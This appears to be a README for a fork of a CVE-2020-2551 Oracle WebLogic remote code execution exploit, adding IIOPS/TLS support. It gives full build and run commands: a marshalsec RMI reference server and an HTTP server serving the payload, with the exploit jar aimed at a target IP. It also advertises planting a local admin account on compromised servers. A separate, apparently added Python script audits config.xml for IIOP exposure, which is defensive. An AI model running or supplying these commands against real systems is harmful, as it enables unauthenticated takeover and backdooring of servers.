Fork from https://github.com/Y4er/CVE-2020-2551 with some quality of life changes. See below for more details.
A remote code execution vulnerability was found in Oracle Weblogic Server. A remote, unauthenticated attacker could exploit this vulnerability and cause a remote IIOP server to initialize a Java object that invokes a JNDI lookup to a remote, attacker-controlled server. A malicious JNDI lookup will result in code execution.
- The original tool from https://github.com/Y4er/CVE-2020-2551 only supports IIOP (7001/tcp); IIOPS (7002/tcp) was not implemented.
- Support for WebLogic on x.x.x.x:7002 (IIOPS) as well as x.x.x.x:7001 (IIOP)
- Support for WebLogic servers that accept TLS 1.2 only
- Detect when the IIOP protocol has been disabled on the WebLogic server
- Switch to SSL (IIOPS) when TCP port 7002 is selected instead of 7001 (IIOP)
- Add a metasploit|metasploit local admin account on the WebLogic server on successful exploitation
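Since the tool above reports when IIOP has been disabled, the corresponding hardening check on the defender's side is to audit which servers in a domain still have IIOP turned on. The following script is an added example, not part of this fork or the original project. It assumes the WebLogic `config.xml` layout (a `<server>` element with `<name>`, `<listen-port>`, an optional `<ssl>` block and an optional `<iiop-enabled>` flag, with a missing flag meaning the default of enabled) and runs over a constructed sample document rather than a real domain.

```python
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional

# Constructed sample domain config (not taken from the page). Element names
# follow the WebLogic config.xml layout as assumed here: <server> children
# <name>, <listen-port>, <iiop-enabled>, and an <ssl> block with <listen-port>.
SAMPLE_CONFIG = """<?xml version="1.0" encoding="UTF-8"?>
<domain xmlns="http://xmlns.oracle.com/weblogic/domain">
  <name>base_domain</name>
  <server>
    <name>AdminServer</name>
    <listen-port>7001</listen-port>
    <ssl><enabled>true</enabled><listen-port>7002</listen-port></ssl>
  </server>
  <server>
    <name>ManagedServer1</name>
    <listen-port>8001</listen-port>
    <iiop-enabled>false</iiop-enabled>
  </server>
  <server>
    <name>ManagedServer2</name>
    <listen-port>8002</listen-port>
    <iiop-enabled>true</iiop-enabled>
  </server>
</domain>
"""


def _local(tag: str) -> str:
    """Strip the XML namespace so '{ns}server' becomes 'server'."""
    return tag.rsplit("}", 1)[-1]


def _child_text(elem: ET.Element, name: str, default: Optional[str] = None) -> Optional[str]:
    """Text of the first direct child named `name`, or `default` if absent."""
    for child in elem:
        if _local(child.tag) == name:
            return (child.text or "").strip()
    return default


def audit_iiop(config_xml: str) -> List[Dict]:
    """Return one record per <server> saying whether IIOP is still enabled.

    Assumption: a missing <iiop-enabled> element means the WebLogic default,
    which is enabled, so such servers are reported as exposed.
    """
    root = ET.fromstring(config_xml)
    findings = []
    for server in root:
        if _local(server.tag) != "server":
            continue
        flag = (_child_text(server, "iiop-enabled", "true") or "true").lower()
        ssl_elem = next((c for c in server if _local(c.tag) == "ssl"), None)
        ssl_port = _child_text(ssl_elem, "listen-port") if ssl_elem is not None else None
        findings.append({
            "server": _child_text(server, "name", "?"),
            "listen_port": _child_text(server, "listen-port", "7001"),
            "ssl_port": ssl_port,
            "iiop_enabled": flag != "false",
        })
    return findings


def servers_needing_attention(config_xml: str) -> List[str]:
    """Names of servers where IIOP is enabled (explicitly or by default)."""
    return [f["server"] for f in audit_iiop(config_xml) if f["iiop_enabled"]]


if __name__ == "__main__":
    for f in audit_iiop(SAMPLE_CONFIG):
        state = "IIOP ENABLED" if f["iiop_enabled"] else "iiop disabled"
        print(f"{f['server']:<16} plain={f['listen_port']} ssl={f['ssl_port']} {state}")
```

Point it at a real `config.xml` by reading the file into `audit_iiop`; servers listed by `servers_needing_attention` still answer on IIOP (7001) or IIOPS (7002) and are the ones to disable or patch first.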
- Oracle WebLogic 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 or 12.2.1.4.0 (fmw_12.1.3.0.0_wls.jar) from http://www.oracle.com/technetwork/middleware/weblogic/downloads/wls-for-dev-1703574.html
- JDK 1.6 (jdk-6u45-linux-x64.bin) from https://www.oracle.com/sg/java/technologies/javase-java-archive-javase6-downloads.html
- JDK 1.8 (jdk-8u281-linux-x64.tar.gz) from https://www.oracle.com/sg/java/technologies/javase/javase-jdk8-downloads.html
- marshalsec-0.0.3-SNAPSHOT-all.jar from https://github.com/RandomRobbieBF/marshalsec-jar/blob/master/marshalsec-0.0.3-SNAPSHOT-all.jar?raw=true
- Ant (apt install ant)
```shell
# Copy jdk-6u45-linux-x64.bin and jdk-8u281-linux-x64.tar.gz to /tmp
$ apt install ant
$ cd /tmp
$ wget https://github.com/RandomRobbieBF/marshalsec-jar/blob/master/marshalsec-0.0.3-SNAPSHOT-all.jar?raw=true -O marshalsec-0.0.3-SNAPSHOT-all.jar
$ tar xvfz jdk-8u281-linux-x64.tar.gz
$ ./jdk-6u45-linux-x64.bin
$ git clone http://peneuw2c-git01.fgxint.net:3000/klee/CVE-2020-2551
$ cd CVE-2020-2551
$ make
```
If you are targeting a WebLogic server on x.x.x.x:7002 (IIOPS), run the commands below first, replacing 172.16.164.2 with the target's IP address. If you are targeting x.x.x.x:7001 (IIOP), skip this step.
```shell
$ echo -n | openssl s_client -connect 172.16.164.2:7002 | sed -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > ~/172.16.164.2.crt
$ keytool -import -v -trustcacerts -alias 172.16.164.2 -file ~/172.16.164.2.crt -keystore /tmp/jdk1.8.0_281/jre/lib/security/cacerts -keypass changeit -storepass changeit
```
```shell
$ java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://172.16.164.1/#exp" 1099
$ cd src && python3 -m http.server --bind 0.0.0.0 80
$ java -jar /tmp/CVE-2020-2551/build/jar/weblogic_CVE_2020_2551.jar 172.16.164.2 7001 rmi://172.16.164.1:1099/exp
```